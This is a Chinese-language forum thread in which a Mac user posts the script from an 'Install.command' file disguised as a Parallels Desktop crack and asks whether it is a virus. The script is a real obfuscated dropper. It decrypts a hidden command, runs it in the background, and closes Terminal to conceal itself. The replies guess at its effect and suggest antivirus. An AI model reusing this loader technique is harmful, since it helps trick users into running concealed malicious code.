Install.command伪装成破解文件
#!/bin/bashappDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal
上面是文件里面的代码,我在下载某个破解文件的时候出现的,不知道什么意思,也不知道是不是病毒。我的电脑是mac book pro,在安装parallel desktop软件的时候想要下载一个破解补丁,下载后发现文件就是上面的文件,点击下就运行了,然后啥都没了。
貌似是把你所有文件都给加密了,对吗 5omggx 发表于 2019-11-20 10:57
貌似是把你所有文件都给加密了,对吗
没有,没有任何反应 刚中招了,找个杀毒杀一下
页:
[1]